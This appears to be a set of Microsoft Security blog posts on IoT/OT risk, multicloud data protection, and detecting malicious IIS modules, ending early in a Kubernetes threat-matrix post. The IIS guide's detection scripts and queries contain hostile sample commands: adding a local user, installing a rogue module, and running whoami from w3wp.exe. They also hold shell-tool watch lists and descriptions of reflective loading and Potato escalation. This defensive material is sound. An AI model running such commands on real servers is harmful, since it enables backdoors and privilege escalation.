As connectivity across converging IT, OT, and IoT increases, organizations and individuals need to rethink cyber risk impact and consequences. Just as the loss of a laptop or modern vehicle containing a homeowner’s cached Wi-Fi credentials could grant a property thief unauthorized network access, compromising a manufacturing facility’s remotely connected equipment or a smart building’s security cameras introduces new vectors for threats like malware or industrial espionage.
With more than 41 billion IoT devices across enterprise and consumer environments expected by 2025—according to International Data Corporation (IDC) research1—devices such as cameras, smart speakers, or locks and commercial appliances can become entry points for attackers.
As OT systems underpinning energy, transportation, and other infrastructures become increasingly connected to IT systems, the risk of disruption and damage grows as boundaries blur between these formerly separated worlds. Microsoft has identified unpatched, high-severity vulnerabilities in 75 percent of the most common industrial controllers in customer OT networks, illustrating how challenging it is for even well-resourced organizations to patch control systems in demanding environments sensitive to downtime.
For businesses and infrastructure operators across industries, the defensive imperatives are gaining total visibility over connected systems and weighing evolving risks and dependencies. Unlike the IT landscape of common operating systems, business applications, and platforms, OT and IoT landscapes are more fragmented, featuring proprietary protocols and devices that may not follow any cybersecurity standard. Practical constraints on patching and vulnerability management, such as the downtime-sensitive environments noted above, add to the challenge.
While connected OT and IoT-enabled devices offer significant value to organizations looking to modernize workspaces, become more data-driven, and ease demands on staff through shifts like remote management and automation in critical infrastructure networks, if not properly secured, they increase the risk of unauthorized access to operational assets and networks.
David Atch, Microsoft Threat Intelligence, Head of IoT and OT Security Research, highlights in this edition’s profile that to address IT and OT threats to critical infrastructure, organizations must have full visibility into the number of IT, OT, and IoT devices in their enterprise, where and how they converge, and the vital data, resources, and utilities accessible across these devices. Without this, organizations face both mass information disclosure (such as leaked production data of a factory) and the potential elevation of privilege for command and control of cyber-physical systems (such as stopping a factory production line). He shares additional insights in the Cyber Signals digital briefing, where we take a deeper dive into the wider risks that converging IT, IoT, and OT systems pose.
Securing IoT solutions with a Zero Trust security model starts with requirements that are not IoT-specific: ensuring you have implemented the basics of securing identities and their devices and limiting their access. These requirements include explicitly verifying users, having visibility into the devices on the network, and real-time risk detection.
We hope these resources are helpful in understanding and managing this evolving risk. To learn more about IT, OT, and IoT threats and explore the latest cybersecurity insights and updates visit Security Insider.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
What does it mean to be a multicloud organization? As the name implies, the term describes a model of cloud computing where an organization uses multiple clouds—two or more public clouds, private clouds, or a combination of public, private, and edge clouds—to distribute applications and services. Subscribing to multiple cloud vendors can help your business access best-of-breed solutions along with competitive pricing.
The downside? Using multiple cloud platforms can create inconsistent infrastructures that don’t scale across environments. This can lead to teams working in silos—bringing increased complexity, additional costs, network security gaps, and risks to business-critical applications and data. It’s not unheard of for some organizations to own 80 to 100 different security tools stitched across hybrid and multicloud environments, while still wondering: are we secure? In this blog, we’ll help you answer that question by detailing four qualities a multicloud data-protection solution should provide and how Microsoft Purview can help unify security, compliance, and data protection across your enterprise.
Multiple clouds require unified data protection
Enabling multicloud integration and automation at scale is essential for fostering a robust partner ecosystem. Since 89 percent of enterprise customers have moved to a multicloud environment, maintaining security across your expanding data estate is necessary.1 Patchwork solutions can create vulnerabilities, whereas a comprehensive solution can deliver seamless data protection and data governance across your entire digital estate.
Look for a multicloud security and data-protection solution that:
Unifies auto-discovery and protection of sensitive data. Your multicloud data-protection solution should provide comprehensive security and compliance tools that span both first- and third-party apps and services and cover Personally Identifiable Information (PII), such as home addresses, dates of birth, and Social Security Numbers. Look for features such as built-in sensitivity labeling within applications and services, including pop-up user notifications that guide users on security best practices. These features help ensure all sensitive data is correctly classified and labeled, so that data loss prevention policies can stop files from leaving without proper permissions.
A data-protection solution with rights management and automatic encryption of emails (and attachments), as well as co-authoring of encrypted documents, will help to ensure secure collaboration. Your multicloud security tool should be flexible enough to allow manual labeling of some sensitive files for leadership-only access (like mergers and acquisitions projects), while also enabling admins to automatically label and protect business files stored in Microsoft SharePoint or Microsoft Teams (like Confidential labels for Finance or HR records). This tool should also be able to scan and classify on-premises file shares, as well as cloud applications and services.
Protects sensitive files and documents from being exfiltrated to third-party applications and services. More than 40 percent of corporate data is dark,2 meaning it is not classified, protected, or governed. This invites risk in the form of sensitive data leakage, which can harm your reputation and, in the case of leaked PII, lead to costly litigation. Your multicloud security solution should be able to classify files and documents, apply sensitivity labels, provide sharing controls and file governance, and use near real-time data loss prevention policies to prevent data leakage across third-party apps.
Uses automated data discovery across structured and unstructured data. Every organization needs to be able to securely share data both internally and with partners and customers. That’s why your data protection solution needs to provide data scanning and classification for all types of assets across multicloud and on-premises environments. Metadata and descriptions of data assets should be integrated into a holistic map of your data estate. Atop this map, purpose-built apps can create environments for data discovery, access management, and insights about your data landscape.
Applies Zero Trust principles to your entire digital estate. This includes strong multifactor authentication to verify user identities, as well as ensuring all endpoints are in compliance. Your data-protection solution should also ensure that governance and compliance policies are built in, and continuous risk assessment and forensics capabilities are implemented. Other key functions should include classifying, labeling, and encrypting emails and documents, as well as adaptive access to software as a service (SaaS) applications and on-premises applications.
Integrate for comprehensive protection
Overcoming the siloed approach in a multicloud environment can be a challenge. However, the risks are too great to make do with ad-hoc, patchwork security solutions. Beyond PII, also at stake is your business’s intellectual property (IP), financial statements, organizational structures, employee contacts, and other information that could be targeted with ransomware, phishing, and password attacks.
Microsoft Purview’s information protection and governance capabilities help your organization address potential data vulnerabilities across a multicloud environment by integrating information protection and data lifecycle management, along with data loss prevention, insider risk management, and eDiscovery. Microsoft Purview’s data governance portal helps manage your entire data landscape—on-premises, multicloud, and SaaS—allowing you to create a comprehensive, up-to-date map of your data wherever it resides. This unified governance enables data curators and security admins to keep your data secure; all while empowering users to find the trustworthy data they need.
Microsoft Priva adds another layer of protection with privacy risk management, helping to identify data-privacy risks and automate mitigation wherever the data lives. To accommodate individuals who ask to review or manage the personal data you hold about them, Microsoft Priva Subject Rights Requests includes the Microsoft Graph subject rights requests API. This API helps your organization do more with less by automating searches across Microsoft Exchange, Microsoft OneDrive, SharePoint, and Teams.
And to protect the business-critical apps you rely on, Microsoft Defender for Cloud Apps helps you classify sensitive information using real-time controls that monitor data accessed across your multicloud environment. As a cloud access security broker (CASB), Defender for Cloud Apps blocks attacks against your apps using automated identity governance, and it integrates seamlessly with Microsoft Entra Permissions Management to root out and remediate permission risks.
Look for a built-in data protection solution
Any data-protection solution needs to address the four areas discussed—unified discovery and protection, protection against data exfiltration, control of unstructured data, and a foundation of Zero Trust—across hybrid and multicloud environments. Both Microsoft 365 and Microsoft Azure are purpose-built with Zero Trust as a core architectural principle. And with comprehensive, integrated solutions for information protection, data governance, risk management, and compliance, Microsoft Purview builds on all four pillars—so you can move forward, fearless.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.
Web exploitation and web shells are some of the most common entry points in the current threat landscape. Web servers provide an external avenue directly into your corporate network, which often results in web servers being an initial intrusion vector or mechanism of persistence. Monitoring for exploitation and web shells should be a high priority for all networks, and while these detection techniques are targeted towards malicious IIS modules, a lot of these techniques will also provide general web shell detections.
IIS modules, and the persistent backdoors that malicious IIS modules create, were recently covered in the Microsoft Security blog titled Malicious IIS modules creating persistent backdoors. In this blog, the Microsoft Detection and Response Team (DART) provides further guidance on detecting malicious IIS modules and on other capabilities (such as logging) that you can use during your own investigations. While we cover Microsoft Defender for Endpoint detections here, the detection methods themselves are tool agnostic. The queries listed are not definitive detection queries, but rather base queries that you can build on to suit your specific environment.
A history of malicious IIS modules
The concept of malicious IIS modules has been around since at least 2013. Historical malware analysis shows how crimeware groups used IIS modules to intercept client logons and payment details, using the BeginRequest trigger to read user-provided parameters before the web server processed them.
One of the first examples of a sophisticated IIS module was discovered in late 2021. The vendor’s ICEAPPLE report details an IIS module that an actor used to reflectively load further .NET assemblies, which in turn loaded further .NET capability. This let the actor keep minimal malicious indicators in the base IIS module and load additional capabilities only as required.
A more recent example, covered in the Microsoft blog mentioned above, shows an actor opting for child process execution rather than loading the capability directly into w3wp.exe. The rest of this blog discusses the different capabilities that malicious IIS modules have access to, and how to detect each of them.
Malicious IIS modules techniques
Event handlers
A core part of IIS module functionality is event handling. Event triggers provide opportunities for code to be called when specific actions happen. IIS modules have access to 27 event triggers by default, including:
Begin Request: When a request is received by the webserver.
End Request: When a response is about to be sent to the client.
Error: When an error happens.
Log Request: When a request is about to be logged.
Event handlers, which run when their associated trigger fires, allow an actor to essentially set up a proxy on the IIS server. By registering handlers for the BeginRequest, EndRequest, and Error triggers, the actor can intercept every request before the web application processes it and every response before it is sent to the client.
Figure 1. Diagram showing how the malicious IIS module sits between the web server and the client
Event handlers are given full read and write access to the request, which allows a malicious IIS module to hide web shell communications within any part of the HTTP request, turning every URL on the server, whether or not a page exists there, into a web shell. The command channel can sit in the query parameters, the body, the headers, or even the HTTP method.
These aspects of malicious IIS modules make them very hard to detect in standard IIS logs. You cannot rely on usual web shell detection strategies, such as high frequency page requests or URI patterns. Malicious IIS modules instead require new detection techniques and use of advanced IIS logging.
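Because a module registered in the configuration is loaded into every worker process regardless of which page is requested, the first detection step is simply to know what is registered. The following Python script is an added example for this guidance and is not DART’s code: it parses an applicationHost.config excerpt, lists the native (globalModules) and managed (modules) entries, and flags any that do not come from the stock IIS install. The config excerpt is constructed, and the trusted directory and namespace lists are assumptions; replace them with a baseline taken from a clean server of the same build.

```python
"""Inventory the IIS modules registered in applicationHost.config.

Added example for this guidance, not DART's code. SAMPLE_CONFIG is a
constructed excerpt; INETSRV and TRUSTED_MANAGED_PREFIXES are assumptions
to replace with a baseline taken from a clean server of the same build.
"""
import xml.etree.ElementTree as ET

SAMPLE_CONFIG = """<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\\System32\\inetsrv\\loghttp.dll" />
      <add name="StaticFileModule" image="%windir%\\System32\\inetsrv\\static.dll" />
      <add name="HttpCacheModule" image="C:\\Windows\\Temp\\cachemod.dll" />
    </globalModules>
    <modules>
      <add name="HttpLoggingModule" />
      <add name="HttpCacheModule" />
      <add name="FormsAuthentication" type="System.Web.Security.FormsAuthenticationModule" />
      <add name="ImageHandler" type="Imaging.Handler, Imaging, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    </modules>
  </system.webServer>
</configuration>"""

# Assumption: stock native modules are loaded from this directory.
INETSRV = "c:\\windows\\system32\\inetsrv\\"
# Assumption: managed modules shipped with .NET and IIS live in these namespaces.
TRUSTED_MANAGED_PREFIXES = ("System.Web.", "Microsoft.Web.")


def normalise(path: str) -> str:
    """Lower-case, expand the usual %windir% forms, and use backslashes."""
    p = path.lower().replace("/", "\\")
    for var in ("%windir%", "%systemroot%"):
        p = p.replace(var, "c:\\windows")  # assumption: Windows lives on C:
    return p


def find_suspicious_modules(config_xml: str) -> list:
    """Return one dict per module whose origin is not the stock IIS install."""
    root = ET.fromstring(config_xml)
    findings = []
    # Native modules: a DLL mapped into every w3wp.exe on the host.
    for section in root.iter("globalModules"):
        for add in section.findall("add"):
            image = add.get("image", "")
            if not normalise(image).startswith(INETSRV):
                findings.append({"name": add.get("name"), "kind": "native",
                                 "reason": "image outside inetsrv: " + image})
    # Managed modules: a .NET type the integrated pipeline instantiates.
    for section in root.iter("modules"):
        for add in section.findall("add"):
            type_name = add.get("type")
            if type_name is None:
                continue  # enables a native module already checked above
            if not type_name.startswith(TRUSTED_MANAGED_PREFIXES):
                findings.append({"name": add.get("name"), "kind": "managed",
                                 "reason": "type outside trusted namespaces: " + type_name})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_modules(SAMPLE_CONFIG):
        print(f"{f['kind']:8} {f['name']:20} {f['reason']}")
```

Run it against the real file under %windir%\System32\inetsrv\config and against each site’s web.config, since a managed module can be registered at either level. Note the constructed sample reuses the stock name HttpCacheModule for a DLL in a temp directory; a name alone proves nothing. A path check also does not catch a stock DLL that has been replaced in place, so pair this inventory with Authenticode signature and hash checks on every image it lists.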
Request and response tampering
An additional difficulty with malicious IIS modules is that they can tamper with any aspect of the request and/or response. This could include removing web shell commands from parameters or headers and preventing web shell commands from being logged.
IIS Modules can also intercept responses before they are sent, which presents the opportunity for an actor to serve malicious payloads into any response from the website, potentially infecting viewers of the website.
Process creation
w3wp.exe, the IIS worker process, hosts the web applications that run within IIS. Process creation is the most common indication of a web shell on IIS servers. Monitoring for the creation of common shell tooling (cmd, PowerShell, rundll32, mshta) with the parent process w3wp.exe can help detect low-sophistication IIS modules.
This should not be considered a strong detection for IIS modules. With full integration with C# and the .NET framework, a large amount of functionality can be integrated to execute directly within the IIS process without relying on creating child processes.
.NET assembly loading
A common execution path for actors is to load .NET modules directly into memory through reflectively loading assemblies. This can allow common tools, such as SharpHound or the Potato PrivEsc family, to be loaded without being written to disk. This is also seen as a stealthier alternative to process creation because it’s within the context of w3wp.exe rather than within a child process.
Figure 2. SweetPotato named pipes being created from within w3wp.exe
As mentioned in the vendor paper earlier, assemblies can be provided arbitrarily to deliver additional functionality. This may be through providing the assembly through the web request or downloading the assembly from an actor-controlled C2. The figure below shows:
SharpHound being downloaded from an external C2 and loaded through the Reflection Assembly Load method.
Two methods being invoked within the binary and the output directory being set to ProgramData.
Figure 3. Example of an IIS module remotely downloading SharpHound and reflectively invoking it
With access to .NET, malicious actors can add additional layers of evasion to prevent detection of their IIS modules, such as encoding or encryption. In the figure below, we can see:
A base64 encoded blob and the size of the decoded assembly.
A new memory allocation is made, where the assembly is decoded and deflated into the new allocation.
The assembly is loaded and invoked, executing the command whoami.
Figure 4. Example of SweetPotato being reflectively loaded and invoked
Logging and monitoring
Advanced IIS Logs
IIS logs are a great place to start hunting for web shells, but advanced IIS logging is recommended because IIS modules can remove malicious traffic from the standard IIS logs. IIS can provide additional advanced logging, such as the Microsoft IIS Configuration Operational log, which can be enabled with the wevtutil command-line tool using the following commands:
Lists additional logs available for IIS: `wevtutil el | findstr -i IIS`
Configuration for the selected log: `wevtutil gl Microsoft-IIS-Configuration/Operational`
Enable the selected log: `wevtutil sl /e:true Microsoft-IIS-Configuration/Operational`
Figure 5. Example showing wevtutil querying the IIS Configuration Operational event log
The log that we will be focusing on in this blog is the Microsoft IIS Configuration Operational log. When enabled, the default path for this log is `C:\Windows\System32\winevt\Logs\Microsoft-IIS-Configuration%4Operational.evtx` (shown in the figure above).
The Microsoft IIS Configuration Operational log captures the addition and removal of IIS modules (Event ID 29). IIS modules are not commonly added to a production IIS server, so alerting on this event ID should be enabled within your SIEM or security products.
Figure 6. Event ID 29 showing the IIS module ‘ProxyShell’ being added to the default website
Note: This IIS module has no correlation with the Exchange Vulnerability ProxyShell.
Figure 7. Event ID 29 showing the IIS module ‘ProxyShell’ being removed from the default website
IIS module listing
IIS modules can be installed at a global level or at a site level. When hunting for malicious IIS modules, it is important to check both the global and the site level for unauthorized modules. Regular monitoring of these locations and comparison against a known-good list can help detect and identify malicious IIS modules. Appcmd (path: %windir%\system32\inetsrv\appcmd.exe), a command-line tool for managing IIS servers, can be used for that purpose. The command ‘appcmd list modules’ lists the global IIS modules on the server. The command ‘appcmd list modules /app.name:<appName>/’ lists the modules for a specific site or application.
Figure 8. Appcmd listing the modules for Default Web Site and showing two malicious modules: “ProxyShell” and “Malicious IIS Module”
Modules listed through appcmd are ordered by installation order. In Figure 8, the two malicious IIS modules, ProxyShell and Malicious IIS Module, were the two most recently installed IIS modules and are therefore the last two on the list. The type parameter also shows the class that is called when the module is loaded.
Web.config
The web.config file, which details the settings for a website, can include modules that the website loads and should therefore be monitored when detecting malicious IIS modules. Monitoring of web.config should primarily focus on tracking modifications to the file, and can be done through multiple tools and sources. For example, the Microsoft IIS Configuration Operational event log produces Event ID 50 when a modification is made to a website. Because the content of the modification is not captured, a backup of the web.config should be stored for easy comparison between the modified file and the original.
Figure 9. Event ID 50 showing that a modification has been made to default website
Most EDRs capture file modification events as well. Enabling an alert for the modification of web.config, especially from the w3wp.exe process, will enable detection of unwarranted changes to the config.
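The comparison against a stored copy of web.config described above can be automated. The following Python script is an added example written for this article, not DART's or Microsoft's code: it parses the two places where a site's web.config registers managed modules (system.webServer/modules for the integrated pipeline and system.web/httpModules for the classic pipeline), then reports any module not present in a baseline. The sample web.config and the baseline set are constructed for the example; the "ProxyShell" entry mirrors the module name used in the figures.

```python
"""Report IIS modules registered in a site's web.config that are absent from a known-good baseline."""
import xml.etree.ElementTree as ET

# Constructed web.config for the example: one extra managed module has been registered
# under system.webServer/modules.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <httpModules>
      <add name="Session" type="System.Web.SessionState.SessionStateModule" />
    </httpModules>
  </system.web>
  <system.webServer>
    <modules>
      <add name="FormsAuthentication" type="System.Web.Security.FormsAuthenticationModule" />
      <add name="ProxyShell" type="ProxyShell.ProxyShellModule, ProxyShell" />
    </modules>
  </system.webServer>
</configuration>
"""

# Hypothetical baseline: (section, module name) pairs the application is known to register.
BASELINE = {
    ("system.webServer/modules", "FormsAuthentication"),
    ("system.web/httpModules", "Session"),
}

# Both locations where a site can register managed modules.
MODULE_SECTIONS = ("system.webServer/modules", "system.web/httpModules")


def _find_path(root, path):
    """Walk child elements by tag name (tags contain dots, so plain iteration is used)."""
    node = root
    for tag in path.split("/"):
        node = next((child for child in node if child.tag == tag), None)
        if node is None:
            return None
    return node


def registered_modules(config_xml):
    """Return {(section, name): type} for every <add> entry under either module section."""
    root = ET.fromstring(config_xml)
    found = {}
    for section in MODULE_SECTIONS:
        node = _find_path(root, section)
        if node is None:
            continue
        for add in node.findall("add"):
            found[(section, add.get("name", ""))] = add.get("type", "")
    return found


def unexpected_modules(config_xml, baseline=BASELINE):
    """Modules in web.config that are not in the baseline, with the class/assembly each one loads."""
    return {key: typ for key, typ in registered_modules(config_xml).items() if key not in baseline}


def removed_modules(config_xml, baseline=BASELINE):
    """Baseline modules that are no longer registered (an actor may also remove, not only add)."""
    return baseline - set(registered_modules(config_xml))


if __name__ == "__main__":
    for (section, name), typ in unexpected_modules(SAMPLE_WEB_CONFIG).items():
        print(f"UNEXPECTED {section}: {name} -> {typ}")
    for section, name in removed_modules(SAMPLE_WEB_CONFIG):
        print(f"MISSING {section}: {name}")
```

The type attribute is worth keeping in the report: it names the class and assembly that w3wp.exe will load, which is the next thing to pull from the site's bin directory or the GAC. Run the same comparison against applicationHost.config for globally registered modules.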
Hunting for malicious IIS modules
IIS module loading
While IIS modules are loaded as ordinary DLLs, not all tools list the .NET modules loaded into w3wp.exe. One tool that does show IIS modules loaded into w3wp.exe is Process Hacker, which, when run with administrative privileges, shows them under the Modules tab.
Figure 10. Malicious ProxyShell IIS module loaded within the w3wp.exe process
In Microsoft Defender for Endpoint, an IIS module that is loaded into w3wp.exe will appear twice: First when loaded from the bin directory from which it resides, then immediately after from the temporary ASP.NET directory.
Figure 11. Malicious IIS module ProxyShell being listed in Defender for Endpoint
By default, IIS modules are loaded when the w3wp.exe process is created. If an IIS module is loaded while the w3wp.exe process is already executing, at a different time than the rest of the modules, it can be an indicator of malicious IIS module loading. Monitoring for abnormal module loads may help detect malicious IIS modules. A query like the KQL one below groups modules loaded into w3wp.exe within the same second. In Figure 12, we can see a large number of modules being loaded within a three-second time period, followed by the malicious ProxyShell IIS module three hours later.
DeviceImageLoadEvents
| where InitiatingProcessFileName has "w3wp.exe"
| summarize loaded_modules=make_set(FileName) by format_datetime(Timestamp, 'yy-MM-dd HH:mm:ss')
| project Timestamp, loaded_modules, count=array_length(loaded_modules)
Figure 12. Anomalous module loading based on timeframe of other IIS modules
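The timing anomaly the KQL query surfaces can be turned into a direct check. The following Python script is an added example for this article, not code from the original post: it reproduces the per-second grouping of the query and then flags any module loaded into a given w3wp.exe process more than a configurable window after that process's first image load. The rows are constructed in the shape of DeviceImageLoadEvents (a subset of columns); the 30-second burst window and the grouping by InitiatingProcessId are choices made for the example.

```python
"""Flag DLLs loaded into w3wp.exe long after the worker process's start-up module burst."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed rows modelled on DeviceImageLoadEvents (subset of columns).
# Three modules arrive at process start; one arrives three hours later.
SAMPLE_EVENTS = [
    {"Timestamp": "2022-12-01T10:00:00", "InitiatingProcessId": 4120, "FileName": "System.Web.dll"},
    {"Timestamp": "2022-12-01T10:00:00", "InitiatingProcessId": 4120, "FileName": "Microsoft.Web.Administration.dll"},
    {"Timestamp": "2022-12-01T10:00:02", "InitiatingProcessId": 4120, "FileName": "System.Configuration.dll"},
    {"Timestamp": "2022-12-01T13:01:12", "InitiatingProcessId": 4120, "FileName": "ProxyShell.dll"},
]


def loads_per_second(events):
    """Mirror of the KQL summarize: {timestamp truncated to the second: set of FileName}."""
    buckets = defaultdict(set)
    for event in events:
        buckets[event["Timestamp"]].add(event["FileName"])
    return dict(buckets)


def late_loads(events, burst_window=timedelta(seconds=30)):
    """Modules loaded more than burst_window after the first load seen for the same w3wp.exe PID.

    Grouping by PID matters: application pool recycles start a new w3wp.exe whose
    start-up burst must not be compared against the previous process's start time.
    """
    first_seen = {}
    parsed = []
    for event in events:
        ts = datetime.fromisoformat(event["Timestamp"])
        pid = event["InitiatingProcessId"]
        first_seen[pid] = min(first_seen.get(pid, ts), ts)
        parsed.append((ts, pid, event["FileName"]))
    # Filter only after every row has been seen so input order does not matter.
    return [(ts.isoformat(), pid, name)
            for ts, pid, name in parsed
            if ts - first_seen[pid] > burst_window]


if __name__ == "__main__":
    for second, names in sorted(loads_per_second(SAMPLE_EVENTS).items()):
        print(f"{second}  {len(names)} module(s)")
    for ts, pid, name in late_loads(SAMPLE_EVENTS):
        print(f"LATE LOAD pid={pid} {ts} {name}")
```

Applications that lazily load their own assemblies on first request will also trip this check, so a per-site allowlist of expected late loads is needed before the result is used for alerting rather than hunting.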
Assembly loading
While IIS modules can load .NET assemblies arbitrarily and reflectively within the context of w3wp.exe, the AppDomains are still registered within the hosting process. By listing the AppDomains and the assemblies loaded into them through a tool like Process Hacker, you can find the loaded IIS module and any .NET assemblies it has loaded.
In Figure 13, the malicious IIS module ProxyShell can be seen alongside the loaded assemblies SharpHound and SweetPotato. Another thing to note is that reflectively loaded assemblies usually do not have Flags: in Figure 13, all the assemblies without Flags were loaded either through the malicious IIS module or through Visual Studio debugging.
The ETW provider Microsoft-Windows-DotNETRuntimeRundown provides a snapshot in time of the loaded .NET modules within active processes. Two events can help detect malicious assemblies loaded within IIS:
Event ID 151 lists loaded AppDomains.
Event ID 155 enumerates assemblies loaded at the time of the rundown.
The ModuleILPath field shows the path of the loaded assembly; however, if this assembly is loaded reflectively, rather than a path to the file, it will instead just list the name of the assembly. The figure below shows how SharpHound and SweetPotato, both with reflectively loaded assemblies, do not have paths while other events do.
Figure 14. Example of reflectively loaded assemblies not having a file path within the ModuleILPath field
The Assembly Flags field may also be 0, similar to Figure 13 where Process Hacker shows empty Flags for the assemblies.
Figure 15. Example of empty assembly flags for .NET rundown
IIS module installation
Processes which contain appcmd or gacutil within the command line and the parent process w3wp.exe should be investigated for potential installation of malicious IIS modules. The following Defender for Endpoint queries can help detect such malicious IIS module installation:
DeviceProcessEvents
| where ProcessCommandLine has "appcmd.exe add module"
| where InitiatingProcessParentFileName == "w3wp.exe"
DeviceProcessEvents
| where ProcessCommandLine has "\\gacutil.exe /I"
| where InitiatingProcessParentFileName == "w3wp.exe"
Process creation
Process creation events with the parent process w3wp.exe should be monitored for abnormal child processes. For IIS servers that legitimately require child processes of w3wp.exe, ignore lists should be created for those child processes to prevent false positives.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName in~ ('w3wp.exe', 'httpd.exe')
| where FileName in~ ('cmd.exe', 'powershell.exe', 'cscript.exe', 'wscript.exe', 'net.exe', 'net1.exe', 'ping.exe', 'whoami.exe')
| summarize instances = count() by ProcessCommandLine, FolderPath, DeviceName, DeviceId
| order by instances asc
If one of the Potato exploits is being used to create processes, the AccountName field may also be “System” while the InitiatingProcessAccountName will be the application pool identity.
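The three process-creation hunts above, the appcmd and gacutil installation queries, the shell-tooling query and the account-mismatch check, can be run together over exported rows. The following Python script is an added example for this article, not Microsoft's code: each hunt is a rule in classify(), and hunt() returns the rows that matched. The rows are constructed in the shape of DeviceProcessEvents (a subset of columns); the allowlist is keyed by device and command line as one way of implementing the ignore lists mentioned above.

```python
"""Evaluate the w3wp.exe process-creation hunts over constructed DeviceProcessEvents rows."""

APPPOOL = "IIS APPPOOL\\DefaultAppPool"

# Constructed rows (subset of DeviceProcessEvents columns). InitiatingProcessFileName is the
# parent of the created process; InitiatingProcessParentFileName is the grandparent.
SAMPLE_PROCESS_EVENTS = [
    {"DeviceName": "WEB01", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c whoami",
     "InitiatingProcessFileName": "w3wp.exe", "InitiatingProcessParentFileName": "svchost.exe",
     "AccountName": APPPOOL, "InitiatingProcessAccountName": APPPOOL},
    {"DeviceName": "WEB01", "FileName": "appcmd.exe",
     "ProcessCommandLine": "appcmd.exe add module /name:ProxyShell /type:ProxyShell.Module",
     "InitiatingProcessFileName": "cmd.exe", "InitiatingProcessParentFileName": "w3wp.exe",
     "AccountName": APPPOOL, "InitiatingProcessAccountName": APPPOOL},
    {"DeviceName": "WEB01", "FileName": "gacutil.exe",
     "ProcessCommandLine": "C:\\Tools\\gacutil.exe /I C:\\inetpub\\wwwroot\\bin\\ProxyShell.dll",
     "InitiatingProcessFileName": "cmd.exe", "InitiatingProcessParentFileName": "w3wp.exe",
     "AccountName": APPPOOL, "InitiatingProcessAccountName": APPPOOL},
    {"DeviceName": "WEB01", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c net user svc_backup P@ssw0rd /add",
     "InitiatingProcessFileName": "w3wp.exe", "InitiatingProcessParentFileName": "svchost.exe",
     "AccountName": "SYSTEM", "InitiatingProcessAccountName": APPPOOL},  # Potato-style escalation
    {"DeviceName": "WEB02", "FileName": "ping.exe",
     "ProcessCommandLine": "ping.exe -n 1 monitor.corp.example",
     "InitiatingProcessFileName": "w3wp.exe", "InitiatingProcessParentFileName": "svchost.exe",
     "AccountName": "IIS APPPOOL\\HealthCheck", "InitiatingProcessAccountName": "IIS APPPOOL\\HealthCheck"},
    {"DeviceName": "WEB02", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c dir",
     "InitiatingProcessFileName": "explorer.exe", "InitiatingProcessParentFileName": "userinit.exe",
     "AccountName": "admin", "InitiatingProcessAccountName": "admin"},
]

WEB_PARENTS = {"w3wp.exe", "httpd.exe"}
SHELL_TOOLS = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe",
               "net.exe", "net1.exe", "ping.exe", "whoami.exe"}


def classify(event, allowlist=frozenset()):
    """Return the names of the hunts the row matches; an empty list means nothing fired."""
    cmd = event["ProcessCommandLine"].lower()
    child = event["FileName"].lower()
    parent = event["InitiatingProcessFileName"].lower()
    grandparent = event.get("InitiatingProcessParentFileName", "").lower()
    hits = []
    if "appcmd.exe add module" in cmd and grandparent == "w3wp.exe":
        hits.append("iis_module_install_appcmd")
    if "\\gacutil.exe /i" in cmd and grandparent == "w3wp.exe":
        hits.append("iis_module_install_gacutil")
    if parent in WEB_PARENTS and child in SHELL_TOOLS and (event["DeviceName"], cmd) not in allowlist:
        hits.append("web_shell_child_process")
    if (parent == "w3wp.exe" and event.get("AccountName", "").upper() == "SYSTEM"
            and event.get("InitiatingProcessAccountName", "").upper().startswith("IIS APPPOOL")):
        hits.append("apppool_to_system_escalation")
    return hits


def hunt(events, allowlist=frozenset()):
    """(DeviceName, FileName, [hunts]) for every row that matched at least one hunt."""
    results = []
    for event in events:
        hits = classify(event, allowlist)
        if hits:
            results.append((event["DeviceName"], event["FileName"], hits))
    return results


if __name__ == "__main__":
    known_good = frozenset({("WEB02", "ping.exe -n 1 monitor.corp.example")})
    for device, name, hits in hunt(SAMPLE_PROCESS_EVENTS, known_good):
        print(f"{device} {name}: {', '.join(hits)}")
```

The fourth row is the one worth pausing on: cmd.exe spawned by w3wp.exe is already suspicious, but a child running as SYSTEM under an application pool parent is the signature of a Potato-style token theft, so it fires two hunts.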
Conclusion
Threat actors use a variety of techniques to conceal their activity when using malicious IIS modules. Enabling additional logging in your environment is recommended to facilitate the detection of these harmful modules. Specifically, IIS servers should enable the optional event log Microsoft IIS Configuration Operational. This log can provide insight into IIS modules being added or removed from the IIS server and track any modifications made to web.config.
IIS Servers should have their web.config and IIS modules monitored for malicious modifications being made. For example, Gacutil.exe and appcmd.exe being executed from w3wp.exe should be monitored for potential installation of IIS modules. Additionally, the bin directories of websites and the default GAC path should be monitored and regularly scanned for malicious modules being created.
Hunting for malicious IIS modules can be performed through Microsoft Defender for Endpoint or your EDR of choice, and it should be conducted regularly to detect abnormal w3wp.exe interactions. This can include, but is not limited to, process creation, file creation and named pipe creation. Due to the wide flexibility around how IIS modules can execute malicious code, it’s important to look for irregularities in behavior.
Detecting web exploitation and malicious IIS modules should be a priority for all organizations, and Microsoft DART believes that following the recommendations provided in this blog and along with the monitoring and detection strategies will assist your organization in the detection and response of these threats.
Today, we are glad to release the third version of the threat matrix for Kubernetes, an evolving knowledge base for security threats that target Kubernetes clusters. The matrix, first released by Microsoft in 2020, was the first attempt to systematically cover the attack landscape of Kubernetes. Since then, the project has received great attention and interest from the Kubernetes security community and was updated last year to keep up with the evolving threat landscape. The latest version of the matrix comes in a new format that simplifies usage of the knowledge base and with new content to help mitigate threats. The new matrix is available at: http://aka.ms/KubernetesThreatMatrix.
What’s new
Mitigation methods
Understanding the attack surface of containerized environments is the first step of building security solutions for these environments. In addition to helping organizations measure and assess coverage of threats with matching detections, the updated threat matrix for Kubernetes can now also help organizations with a systematic approach to apply mitigation techniques that prevent attacks from being successfully launched.
